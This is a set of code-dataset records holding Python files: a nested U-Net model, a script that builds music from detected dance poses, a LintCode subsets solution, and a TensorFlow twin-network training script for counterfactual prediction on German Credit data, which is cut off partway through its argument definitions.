self.conv1_0 = DoubleConvRes(filters[0], filters[1], filters[1])\n self.up1_0 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_0 = DoubleConvRes(filters[1], filters[2], filters[2])\n self.up2_0 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.conv3_0 = DoubleConvRes(filters[2], filters[3], filters[3])\n self.up3_0 = nn.ConvTranspose2d(filters[3], filters[2], 2, stride=2)\n self.conv4_0 = DoubleConvRes(filters[3], filters[4], filters[4])\n self.up4_0 = nn.ConvTranspose2d(filters[4], filters[3], 2, stride=2)\n \n self.conv0_1 = DoubleConvRes(filters[0]*2, filters[0], filters[0]) \n self.conv1_1 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_1 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_1 = DoubleConvRes(filters[2]*2 + filters[1], filters[2], filters[2])\n self.up2_1 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.conv3_1 = DoubleConvRes(filters[3]*2 + filters[2], filters[3], filters[3])\n self.up3_1 = nn.ConvTranspose2d(filters[3], filters[2], 2, 
stride=2)\n\n self.conv0_2 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n self.conv1_2 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_2 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_2 = DoubleConvRes(filters[2]*2 + filters[1], filters[2], filters[2])\n self.up2_2 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n\n self.conv0_3 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n self.conv1_3 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_3 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n\n self.conv0_4 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n \n self.WB3 = Weighted_block(filters[3])\n self.Eup3 = nn.ConvTranspose2d(filters[3], filters[2], 2, stride=2)\n self.WB2 = Weighted_block(filters[2])\n self.Eup2 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.WB1 = Weighted_block(filters[1])\n self.Eup1 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2) \n \n self.final = nn.Conv2d(filters[0], out_ch, 1)\n\n def forward(self, x):\n \n x0_0 = self.conv0_0(x)\n x1_0 = self.conv1_0(self.pool(x0_0))\n x2_0 = self.conv2_0(self.pool(x1_0))\n x3_0 = self.conv3_0(self.pool(x2_0))\n x4_0 = self.conv4_0(self.pool(x3_0))\n \n x0_1 = self.conv0_1(torch.cat([x0_0, self.up1_0(x1_0)], 1)) \n x1_1 = self.conv1_1(torch.cat([self.pool(x0_1), x1_0, self.up2_0(x2_0)], 1))\n x2_1 = self.conv2_1(torch.cat([self.pool(x1_1), x2_0, self.up3_0(x3_0)], 1))\n x3_1 = self.conv3_1(torch.cat([self.pool(x2_1), x3_0, self.up4_0(x4_0)], 1))\n \n x0_2 = self.conv0_2(torch.cat([x0_1, self.up1_1(x1_1)], 1))\n x1_2 = self.conv1_2(torch.cat([self.pool(x0_2), x1_1, self.up2_1(x2_1)], 1))\n x2_2 = self.conv2_2(torch.cat([self.pool(x1_2), x2_1, self.up3_1(x3_1)], 1))\n \n x0_3 = self.conv0_3(torch.cat([x0_2, self.up1_2(x1_2)], 1))\n x1_3 = self.conv1_3(torch.cat([self.pool(x0_3), x1_2, self.up2_2(x2_2)], 1))\n\n x0_4 = self.conv0_4(torch.cat([x0_3, self.up1_3(x1_3)], 1))\n \n WB3 = self.WB3(x3_1)\n Eup3 = self.Eup3(WB3)\n WB2 = self.WB2(x2_2) + Eup3\n Eup2 = self.Eup2(WB2)\n WB1 = self.WB1(x1_3) + Eup2\n Eup1 = self.Eup1(WB1)\n WB0 = Eup1 + x0_4\n \n output = self.final(WB0)\n\n return output","sub_path":"ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641239023","text":"import json\nfrom pydub import AudioSegment\nimport random\nimport os\nimport simpleaudio\n\ndef main(data):\n #Get all positions from dance into an array\n positions = getPositions(data)\n\n #Get all timestamps of positions into an array\n timestamps = getTimestamps(data)\n\n #Decide on a background drum loop, and get the AduioSegment of it\n backgroundDrumLoop = setDrums(timestamps[-1], len(positions))\n\n #Make the drum loop play for as long as the submitted video is in length\n backgroundDrumLoopCorrected = correctDrumLoop(backgroundDrumLoop, timestamps[-1])\n\n #Get an array of AudioSegment objects corresponding to the positions\n positionAudioSegments = getPosAudioSegements(positions)\n\n #Add the AudioSegments of the positions to the background drums at their respective timestamps\n finalSong = addPosSoundToDrums(backgroundDrumLoopCorrected, positionAudioSegments, timestamps)\n\n curDir = os.getcwd()\n newCurDir = curDir.replace(os.sep, '/')\n finalSong.export(newCurDir + \"/sounds/final-song/final.wav\", format=\"wav\")\n\n\n\n\ndef getPositions(data):\n \"\"\"\n Get the positions that 
were determined by the neural network model\n    :param data: JSON Object\n    :return: Array of dance positions\n    \"\"\"\n    positions = data['pos']\n    return positions\n\n\ndef getTimestamps(data):\n    \"\"\"\n    Get the time stamps for each position\n    :param data: JSON Object\n    :return: Array of timestamps\n    \"\"\"\n    timestamps = data['time']\n    return timestamps\n\n\ndef setDrums(endOfVideoTime, numPositions):\n    \"\"\"\n    Choose which background drum loop to play based on how long the dance was\n    and how many moves were made\n    :param endOfVideoTime: The time in ms for how long the dance was\n    :param numPositions: The number of dance positions the user made\n    :return: Which drum loop should be played\n    \"\"\"\n    speedOfDance = numPositions / (endOfVideoTime / 1000)\n    curDir = os.getcwd()\n    newCurDir = curDir.replace(os.sep, '/')\n\n\n    if speedOfDance >= 2:\n        drums = newCurDir + '/sounds/drum-loops/slow-paced-drumloop.wav'\n    elif speedOfDance < 2 and speedOfDance >= 1:\n        randint = random.randint(1,3)\n\n        if randint == 1:\n            drums = newCurDir + '/sounds/drum-loops/medium-paced-scifi-drumloop.wav'\n        elif randint == 2:\n            drums = newCurDir + '/sounds/drum-loops/medium-paced-drumloop.wav'\n        else:\n            drums = newCurDir + '/sounds/drum-loops/med-fast-paced-drumloop.wav'\n    elif speedOfDance < 1:\n        drums = newCurDir + '/sounds/drum-loops/fast-paced-drumloop.wav'\n\n    backgroundDrums = AudioSegment.from_file(drums)\n\n    return backgroundDrums\n\n\ndef correctDrumLoop(drumLoop, timeOfDance):\n    \"\"\"\n    Repeat the background drum loop so that it plays for the entirety of the dance\n    :param drumLoop: an AudioSegment of the selected background drum loop\n    :param timeOfDance: the length of the dance in ms\n    :return: an AudioSegment of the selected background drum loop, corrected in its time length\n    \"\"\"\n    timeOfDanceSeconds = timeOfDance / 1000\n    timeOfDrumLoop = drumLoop.duration_seconds\n    curTime = 0\n    numRepeat = 1\n\n    if timeOfDanceSeconds > timeOfDrumLoop:\n        while curTime < timeOfDanceSeconds:\n            curTime += timeOfDrumLoop\n            numRepeat += 1\n\n\n    drumLoopCorrected = drumLoop * numRepeat\n\n    return drumLoopCorrected\n\n\n\ndef getPosAudioSegements(positions):\n    \"\"\"\n    Given an array of positions, create an array of audio segments matching the positions\n    :param positions: array of dance positions\n    :return: array of AudioSegments corresponding to the positions\n    \"\"\"\n\n    positionList = []\n\n    curDir = os.getcwd()\n    newCurDir = curDir.replace(os.sep, '/')\n\n    fortfive_left_path = newCurDir + '/sounds/position-sounds/45-left.wav'\n    fortyfive_right_path = newCurDir + '/sounds/position-sounds/45-right.wav'\n    a_pose_path = newCurDir + '/sounds/position-sounds/a-pose.wav'\n    backward_c_path = newCurDir + '/sounds/position-sounds/backward-c.wav'\n    c_pose_path = newCurDir + '/sounds/position-sounds/c-pose.wav'\n    double_down_pump_path = newCurDir + '/sounds/position-sounds/double-down-pump.wav'\n    double_fist_pump_up_path = newCurDir + '/sounds/position-sounds/double-fist-pump-up.wav'\n    double_up_pump_path = newCurDir + '/sounds/position-sounds/double-up-pump.wav'\n    down_circle_path = newCurDir + '/sounds/position-sounds/down-circle.wav'\n    left_fist_pump_path = newCurDir + '/sounds/position-sounds/left-fist-pump.wav'\n    left_fist_pump_up_path = newCurDir + '/sounds/position-sounds/left-fist-pump-up.wav'\n    left_lean_path = newCurDir + '/sounds/position-sounds/left-lean.wav'\n    left_up_right_down_path = newCurDir + '/sounds/position-sounds/left-up-right-down.wav'\n    m_pose_path = newCurDir + '/sounds/position-sounds/m-pose.wav'\n    no_pose_path = newCurDir + '/sounds/position-sounds/no-pose.wav'\n    
right_fist_pump_path = newCurDir + '/sounds/position-sounds/right-fist-pump.wav'\n right_fist_pump_up_path = newCurDir + '/sounds/position-sounds/right-fist-pump-up.wav'\n right_lean_path = newCurDir + '/sounds/position-sounds/right-lean.wav'\n right_up_left_down_path = newCurDir + '/sounds/position-sounds/right-up-left-down.wav'\n t_pose_path = newCurDir + '/sounds/position-sounds/t-pose.wav'\n upside_down_y_pose_path = newCurDir + '/sounds/position-sounds/upside-down-y-pose.wav'\n y_pose_path = newCurDir + '/sounds/position-sounds/y-pose.wav'\n\n fortfive_left = AudioSegment.from_file(fortfive_left_path)\n fortyfive_right = AudioSegment.from_file(fortyfive_right_path)\n a_pose = AudioSegment.from_file(a_pose_path)\n backward_c = AudioSegment.from_file(backward_c_path)\n c_pose = AudioSegment.from_file(c_pose_path)\n double_down_pump = AudioSegment.from_file(double_down_pump_path)\n double_fist_pump_up = AudioSegment.from_file(double_fist_pump_up_path)\n double_up_pump = AudioSegment.from_file(double_up_pump_path)\n down_circle = AudioSegment.from_file(down_circle_path)\n left_fist_pump = AudioSegment.from_file(left_fist_pump_path)\n left_fist_pump_up = AudioSegment.from_file(left_fist_pump_up_path)\n left_lean = AudioSegment.from_file(left_lean_path)\n left_up_right_down = AudioSegment.from_file(left_up_right_down_path)\n m_pose = AudioSegment.from_file(m_pose_path)\n no_pose = AudioSegment.from_file(no_pose_path)\n right_fist_pump = AudioSegment.from_file(right_fist_pump_path)\n right_fist_pump_up = AudioSegment.from_file(right_fist_pump_up_path)\n right_lean = AudioSegment.from_file(right_lean_path)\n right_up_left_down = AudioSegment.from_file(right_up_left_down_path)\n t_pose = AudioSegment.from_file(t_pose_path)\n upside_down_y_pose = AudioSegment.from_file(upside_down_y_pose_path)\n y_pose = AudioSegment.from_file(y_pose_path)\n\n for pos in range(len(positions)):\n curPos = positions[pos]\n\n if curPos == 'Y pose':\n positionList.append(y_pose)\n elif curPos == 'M pose':\n positionList.append(m_pose)\n elif curPos == 'C pose':\n positionList.append(c_pose)\n elif curPos == 'A pose':\n positionList.append(a_pose)\n elif curPos == 'T pose':\n positionList.append(t_pose)\n elif curPos == '45 Right Pose':\n positionList.append(fortyfive_right)\n elif curPos == '45 left Pose':\n positionList.append(fortfive_left)\n elif curPos == 'no Pose':\n positionList.append(no_pose)\n elif curPos == 'Right fist pump':\n positionList.append(right_fist_pump)\n elif curPos == 'Left fist pump':\n positionList.append(left_fist_pump)\n elif curPos == 'Double pump up':\n positionList.append(double_up_pump)\n elif curPos == 'Double pump down':\n positionList.append(double_down_pump)\n elif curPos == 'Right up left down':\n positionList.append(right_up_left_down)\n elif curPos == 'Left up right down':\n positionList.append(left_up_right_down)\n elif curPos == 'Down Y':\n positionList.append(upside_down_y_pose)\n elif curPos == 'Right fist up':\n positionList.append(right_fist_pump_up)\n elif curPos == 'left fist up':\n positionList.append(left_fist_pump_up)\n elif curPos == 'double fist up':\n positionList.append(double_fist_pump_up)\n elif curPos == 'right lean':\n positionList.append(right_lean)\n elif curPos == 'left lean':\n positionList.append(left_lean)\n elif curPos == 'down circle':\n positionList.append(down_circle)\n elif curPos == 'backwards c':\n positionList.append(backward_c)\n\n return positionList\n\n\ndef addPosSoundToDrums(backgroundDrumLoopCorrected, positionAudioSegments, timestamps):\n 
\"\"\"\n This function will produce the final song for the dance. It will add the AdioSegments of each position\n on top of the drum loop at each specified timestamp\n :param backgroundDrumLoopCorrected: The background drum music\n :param positionAudioSegments: An array of AudioSegments for each position\n :param timestamps: An array of timestamps for each position\n :return: An audiosegmant of the final song\n \"\"\"\n\n for sound in range(len(positionAudioSegments)):\n backgroundDrumLoopCorrected = backgroundDrumLoopCorrected.overlay(positionAudioSegments[sound], position=timestamps[sound])\n return backgroundDrumLoopCorrected\n\n","sub_path":"backend/functions/makeMusic.py","file_name":"makeMusic.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615483461","text":"#coding:utf-8\n\n\"\"\"\n18. Subsets II\nDescription\n\nGiven a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).\n\n Each element in a subset must be in non-descending order.\n The ordering between two subsets is free.\n The solution set must not contain duplicate subsets.\n\nExample 1:\n\n\tInput: [0]\n\tOutput:\n\t[\n\t [],\n\t [0]\n\t]\n\nExample 2:\n\n\tInput: [1,2,2]\n\tOutput:\n\t[\n\t [2],\n\t [1],\n\t [1,2,2],\n\t [2,2],\n\t [1,2],\n\t []\n\t]\n\nChallenge\n\nCan you do it in both recursively and iteratively?\n\n\"\"\"\nclass Solution:\n \"\"\"\n @param nums: A set of numbers.\n @return: A list of lists. All valid subsets.\n \"\"\"\n def subsetsWithDup(self, nums):\n # write your code here\n size=len(nums)\n if size==0:\n return [[]]\n nums.sort()\n ret=[]\n self.dfs(nums,0,size,ret)\n return ret\n \n def dfs(self,nums,begin,size,ret,temp=[]):\n if temp not in ret:\n ret.append(temp[:])\n if begin==size:\n return \n for i in range(begin,size):\n temp.append(nums[i])\n self.dfs(nums,i+1,size,ret,temp)\n temp.pop()\n\n","sub_path":"lintcode刷题/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586924618","text":"import sys\n\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\nimport numpy as np\nimport os\nimport argparse\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf\nfrom dataloader import GermanCreditDataset, get_subportion_confounders\nfrom german_metadata import decre_monoto\nfrom model_twins import Twin_Net_with_Z_A, dice_loss,Twin_Net,multi_class_twin_za\nfrom sklearn.preprocessing import MinMaxScaler\nfrom utils import read_pickle_object,pickle_object\nimport sklearn\nfrom sklearn.metrics import f1_score\nfrom sklearn.utils import resample\n\n\ndef run_train(args):\n\n dataset = GermanCreditDataset(**vars(args))\n\n try:\n dataset.train.drop(['propensity_score','Unnamed: 0'], axis=1, inplace=True)\n dataset.test.drop(['propensity_score','Unnamed: 0'], axis=1, inplace=True)\n except:\n print('Not Propensity matched')\n\n\n if args.oversample:\n raise NotImplementedError\n # y = dataset.train[args.outcome]\n #\n # dataset_proc = dataset.train.drop([args.outcome], axis=1, inplace=False)\n #\n # smote = SMOTE()\n #\n # x_sm, y_sm = smote.fit_resample(dataset_proc, y)\n # x_sm.insert(0,args.outcome,y_sm)\n # scaler = MinMaxScaler()\n # x_sm['{}_prime'.format(args.outcome)] = scaler.fit_transform(x_sm['{}_prime'.format(args.outcome)].values[...,np.newaxis])\n # 
x_sm['{}_prime'.format(args.outcome)].loc[x_sm['{}_prime'.format(args.outcome)]>=0.5] = 1\n # x_sm['{}_prime'.format(args.outcome)].loc[x_sm['{}_prime'.format(args.outcome)]<0.5] = 0\n # y_2 = x_sm['{}_prime'.format(args.outcome)]\n # x_sm.drop(['{}_prime'.format(args.outcome)], axis=1, inplace=True)\n # x_sm_2, y_sm_2 = smote.fit_resample(x_sm, y_2)\n # x_sm_2.insert(0,'{}_prime'.format(args.outcome),y_sm_2)\n # x_sm_2[args.outcome].loc[x_sm_2[args.outcome] >= 0.5] = 1\n # x_sm_2[args.outcome].loc[x_sm_2[args.outcome] < 0.5] = 0\n # x_sm_2['X'].loc[x_sm_2['X'] >= 0.5] = 1\n # x_sm_2['X'].loc[x_sm_2['X'] < 0.5] = 0\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] >= 0.5] = 1\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] < 0.5] = 0\n # dataset.train = x_sm_2\n #\n # y = dataset.test[args.outcome]\n #\n # dataset_proc = dataset.test.drop([args.outcome], axis=1, inplace=False)\n #\n #\n #\n # x_sm, y_sm = smote.fit_resample(dataset_proc, y)\n # x_sm.insert(0, 'Y', y_sm)\n # scaler = MinMaxScaler()\n # x_sm['Y_prime'] = scaler.fit_transform(x_sm['Y_prime'].values[..., np.newaxis])\n # x_sm['Y_prime'].loc[x_sm['Y_prime'] >= 0.5] = 1\n # x_sm['Y_prime'].loc[x_sm['Y_prime'] < 0.5] = 0\n # y_2 = x_sm['Y_prime']\n # x_sm.drop(['Y_prime'], axis=1, inplace=True)\n # x_sm_2, y_sm_2 = smote.fit_resample(x_sm, y_2)\n # x_sm_2.insert(0, 'Y_prime', y_sm_2)\n # x_sm_2['Y'].loc[x_sm_2['Y'] >= 0.5] = 1\n # x_sm_2['Y'].loc[x_sm_2['Y'] < 0.5] = 0\n # x_sm_2['X'].loc[x_sm_2['X'] >= 0.5] = 1\n # x_sm_2['X'].loc[x_sm_2['X'] < 0.5] = 0\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] >= 0.5] = 1\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] < 0.5] = 0\n # dataset.test = x_sm_2\n\n elif args.undersample:\n raise NotImplementedError\n # neg_ = dataset.train[(dataset.train['Y'] == 0) | (dataset.train['Y_prime'] == 0)]\n # pos_ = dataset.train[(dataset.train['Y'] == 1) | (dataset.train['Y_prime'] == 1)]\n # ids = len(neg_)\n # choices = np.random.choice(ids, len(pos_))\n # res_neg_features = neg_.iloc[choices]\n # dataset.train = pd.concat([res_neg_features, pos_], axis=0)\n\n target = dataset.train.pop(args.outcome)\n args.target_max = target.values.max()\n args.target_min = target.values.min()\n target_prime = dataset.train.pop('{}_prime'.format(args.outcome))\n\n\n treatment = dataset.train.pop(args.treatment)\n treatment_prime = dataset.train.pop('{}_prime'.format(args.treatment))\n uy = dataset.train.pop('Uy')\n\n dataset.test = dataset.test.reset_index().drop(['index'],axis=1)\n\n target_test = dataset.test.pop('{}'.format(args.outcome))\n target_prime_test = dataset.test.pop('{}_prime'.format(args.outcome))\n treatment_test = dataset.test.pop('{}'.format(args.treatment))\n treatment_prime_test = dataset.test.pop('{}_prime'.format(args.treatment))\n uy_test = dataset.test.pop('Uy')\n\n if 'multi_azlink' == args.architecture:\n nb_classes = args.target_max + 1\n target = np.eye(nb_classes.astype(int))[target.astype(int)]\n target_prime = np.eye(nb_classes.astype(int))[target_prime.astype(int)]\n target_test = np.eye(nb_classes.astype(int))[target_test.astype(int)]\n target_prime_test = np.eye(nb_classes.astype(int))[target_prime_test.astype(int)]\n\n if args.cat_treat:\n treatment = treatment.astype(int)\n treatment_prime = treatment_prime.astype(int)\n treatment_test = treatment_test.astype(int)\n treatment_prime_test = treatment_prime_test.astype(int)\n\n # Get confounders\n\n dataset.train = get_subportion_confounders(dataset.train, args.confounders)\n dataset.test = get_subportion_confounders(dataset.test, 
args.confounders)\n\n args.len_conf = len(dataset.train.columns)\n\n # using multiple inputs or all confounders together ?\n if args.multiple_confounders:\n args.z_monotonicity = []\n input_len = args.len_conf + 2\n\n args.z_monotonicity_latice = []\n for i, col in enumerate(dataset.train.columns):\n\n if col in decre_monoto and args.z_monotonicity_base!=0:\n args.z_monotonicity.append(0)\n else:\n args.z_monotonicity.append(args.z_monotonicity_base)\n\n\n args.lattice_sizes.append(args.z_calib_units)\n\n else:\n\n args.z_monotonicity = [args.z_monotonicity]\n args.lattice_sizes.append(args.len_conf)\n\n # Define Model\n\n if 'twin' == args.architecture:\n model = Twin_Net(treatment, uy, dataset.train, args)\n elif 'multi_azlink' == args.architecture:\n model = multi_class_twin_za(treatment, uy, dataset.train, args)\n else:\n model = Twin_Net_with_Z_A(treatment, uy, dataset.train, args)\n\n # Set up loss\n if 'mse' in args.loss:\n loss_func = tf.keras.losses.mean_squared_error\n elif 'mae' in args.loss:\n loss_func = tf.keras.losses.mean_absolute_error\n elif 'bce' in args.loss:\n loss_func = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n elif 'dice' in args.loss:\n loss_func = dice_loss\n elif 'hinge' in args.loss:\n loss_func = tf.keras.losses.hinge\n\n\n # Save Hparams\n pickle_object(vars(args), os.path.join(args.runPath, 'hparams.pkl'))\n if args.lr_schedule:\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n args.lr,\n decay_steps=len(dataset.train)*10,\n decay_rate=0.96,\n staircase=True)\n\n optimizer = tf.keras.optimizers.Adagrad(learning_rate=lr_schedule)\n else:\n optimizer = tf.keras.optimizers.Adam(learning_rate=args.lr)\n\n if args.weighted_loss:\n model.compile(\n loss=[loss_func,loss_func],\n loss_weights = [args.weight_1, args.weight_2],\n optimizer=optimizer)\n else:\n model.compile(\n loss=loss_func,\n optimizer=optimizer)\n\n cp_callback_best = tf.keras.callbacks.ModelCheckpoint(\n filepath=args.runPath + '/best',\n verbose=1,\n save_weights_only=True,\n save_best_only=True,\n monitor='val_loss')\n cp_callback_latest = tf.keras.callbacks.ModelCheckpoint(\n filepath=args.runPath + '/latest',\n verbose=0,\n save_weights_only=True,\n save_best_only=False,\n save_freq=100 * args.batch_size)\n\n if args.train:\n print('-------------------------Experiment: {} ---------------------'.format(args.name))\n conf_to_input = [dataset.train.values.astype(np.float32)]\n conf_to_input_test = [dataset.test.values.astype(np.float32)]\n\n if args.multiple_confounders:\n conf_to_input = [dataset.train[i].values.astype(np.float32) for i in dataset.train.columns]\n conf_to_input_test = [dataset.test[i].values.astype(np.float32) for i in dataset.test.columns]\n\n if args.architecture != 'multi_azlink':\n target = [target.values[..., np.newaxis]]\n target_prime = [target_prime.values[..., np.newaxis]]\n target_test = [target_test.values[..., np.newaxis]]\n target_prime_test = [target_prime_test.values[..., np.newaxis]]\n else:\n target = [target[:,i][...,np.newaxis] for i in range(target.shape[-1])]\n target_prime = [target_prime[:,i][...,np.newaxis] for i in range(target_prime.shape[-1])]\n target_test = [target_test[:, i][..., np.newaxis] for i in range(target_test.shape[-1])]\n target_prime_test = [target_prime_test[:, i][..., np.newaxis] for i in range(target_prime_test.shape[-1])]\n\n model.fit(\n [treatment.values.astype(np.float32), treatment_prime.values.astype(np.float32),\n uy.values.astype(np.float32), conf_to_input],\n [*target,*target_prime],\n 
batch_size=args.batch_size,\n epochs=args.epochs,\n validation_split=0.2,\n shuffle=True,\n\n callbacks=[cp_callback_best, cp_callback_latest],\n verbose=1)\n print('-------------------------Experiment: {} ---------------------'.format(args.name))\n\n\n model.load_weights(args.runPath + '/best')\n # model.save(args.runPath + '/best_model.tf')\n\n conf_to_input = [dataset.test.values.astype(np.float32)]\n if args.multiple_confounders:\n conf_to_input = [dataset.test[i].values.astype(np.float32) for i in dataset.test.columns]\n test_loss = model.evaluate([treatment_test.values.astype(np.float32),treatment_prime_test.values.astype(np.float32),\n uy_test.values.astype(np.float32),\n conf_to_input],\n [*target_test, *target_prime_test],)\n print('Test Loss : {}'.format(test_loss))\n preds = model.predict([treatment_test.values.astype(np.float32),treatment_prime_test.values.astype(np.float32),\n uy_test.values.astype(np.float32), conf_to_input],\n args.batch_size, 1)\n\n title = ['Factual', 'Counterfactual']\n if args.architecture != 'multi_azlink':\n preds = preds[0:2]\n target_prime_test = target_prime_test[0]\n target_test = target_test[0]\n else:\n preds = [np.hstack(preds[0:3]), np.hstack(preds[3:])]\n target_prime_test = np.hstack(target_prime_test)\n target_test = np.hstack(target_test)\n for i, pred in enumerate(preds):\n if title[i] == 'Counterfactual':\n gt = target_prime_test\n else:\n gt = target_test\n\n if 'Y' not in args.outcome or args.architecture == 'multi_azlink':\n scaler = MinMaxScaler()\n pred = scaler.fit_transform(pred)\n pred[pred >= 0.5] = 1\n pred[pred < 0.5] = 0\n else:\n pred = np.digitize(pred, [args.target_min, (args.target_max - args.target_min) / 4,\n (args.target_max - args.target_min) * 3 / 4]) - 1\n\n ac = accuracy_score(pred, gt)\n print('{} Acc: {}'.format(title[i], ac))\n if len(np.unique(gt.values)) > 2:\n f1 = f1_score(gt.values, pred, average='macro')\n else:\n f1 = f1_score(gt.values, pred, )\n print('{} F1 : {}'.format(title[i], f1))\n # auc_r = roc_auc_score(gt.values, pred)\n # print('{} AUC-ROC : {}'.format(title[i], auc_r))\n\n\n\n # inference_wrapper(args, treatment_test, dataset, model)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', type=bool, default=True)\n parser.add_argument('--inference_name',\n default='')\n # Logging\n parser.add_argument('--restore', type=bool, default=False)\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_outcome_{}_2_neighb_{}/')\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_2_outcome_{}_neighb_{}/')\n parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_outcome_{}_neighb_{}/')\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_outcome_{}/')\n parser.add_argument('--name', type=str,\n default='twin_net_arch_{}_{}_uy_{}_uy_monot_{}_z_monot_{}_z_layer_{}_calib_units_{}_z_{}_lr_{}_loss_{}_German_{}_confounders_{}_existing_risk')\n\n\n # Dataset Hparams\n # parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_2_outcome_{}_neighb_{}_{}.csv')\n parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_outcome_{}_neighb_{}_{}.csv')\n # parser.add_argument('--path_to_data', type=str, default='../Data/German Credit/german_data_treatment_{}_outcome_{}_{}.csv')\n parser.add_argument('--load_dataset', 
type=bool, default=True)\n parser.add_argument('--save_dataset', type=bool, default=False)\n parser.add_argument('--save_path', type=str, default='../Data/German Credit/')\n parser.add_argument('--save_name', type=str, default='german_data_treatment_{}_outcome_{}_neighb_{}_{}.csv')\n # parser.add_argument('--save_name', type=str, default='german_data_treatment_{}_outcome_{}_{}.csv')\n parser.add_argument('--n_samples', type=int, default=1000)\n parser.add_argument('--neighb', type=int, default=50)\n parser.add_argument('--propensity_score', type=bool, default=True)\n # parser.add_argument('--treatment', type=str, default='Credit-History')\n parser.add_argument('--treatment', type=str, default='Existing-Account-Status')\n parser.add_argument('--outcome', type=str, default='Status')\n # parser.add_argument('--outcome', type=str, default='Y')\n\n\n # parser.add_argument('--confounders', default=['all'])\n # parser.add_argument('--confounders', default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\", \"Sex\", \"Guarantors\", \"Job\", \"Num-People\",])\n\n # parser.add_argument('--confounders', default=['dig',\"Credit-History\"])\n\n\n # parser.add_argument('--confounders', default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\",])\n # parser.add_argument('--confounders',\n # default=[\"Existing-Account-Status\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n # \"Saving-Acount\"])\n\n parser.add_argument('--confounders',\n default=[\"Credit-History\", \"Month-Duration\", \"Purpose\", \"Credit-Amount\",\n \"Saving-Acount\", \"Present-Employment\", \"Instalment-Rate\", \"Sex\", \"Guarantors\", \"Job\", \"Num-People\"])\n parser.add_argument('--multiple_confounders', default=True, help='split confounders')\n\n parser.add_argument('--u_distribution', default='normal')\n parser.add_argument('--oversample',type=bool, default=False)\n parser.add_argument('--undersample',type=bool, default=False)\n # Model Hparams\n # parser.add_argument('--architecture', default='twin')\n parser.add_argument('--architecture', default='azlink')\n # parser.add_argument('--architecture', default='multi_azlink')\n parser.add_argument('--cat_treat', default=False)\n # parser.add_argument('--cat_buckets', default=5)\n # parser.add_argument('--treat_monot', default=[(0,1),(0,3),(0,4),\n # (1,3),(1,4),\n # (2,0),(2,1),(2,3),(2,4),\n # (3,4)])\n parser.add_argument('--cat_buckets', default=4)\n parser.add_argument('--treat_monot', default=[(0,1),(0,2),(0,3),\n (1,3),(1,2),\n (2,3),\n ])\n\n parser.add_argument('--lattice_sizes', default=[4,4])\n parser.add_argument('--epochs', type=int, default=2000)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--lattice_units', type=int, default=1)\n parser.add_argument('--treat_calib_units', type=int, default=4)\n parser.add_argument('--uy_hidden_dims', type=int, default=4)\n parser.add_argument('--z_calib_units', type=int, default=4)\n parser.add_argument('--layer', default='linear')\n parser.add_argument('--uy_layer', default='none')\n parser.add_argument('--z_layer', default='none')\n parser.add_argument('--treat_monotonicity', default='increasing')\n parser.add_argument('--uy_monotonicity', default='none')\n parser.add_argument('--z_monotonicity', default='none')\n parser.add_argument('--z_monotonicity_latice', default='same', help='4 or 
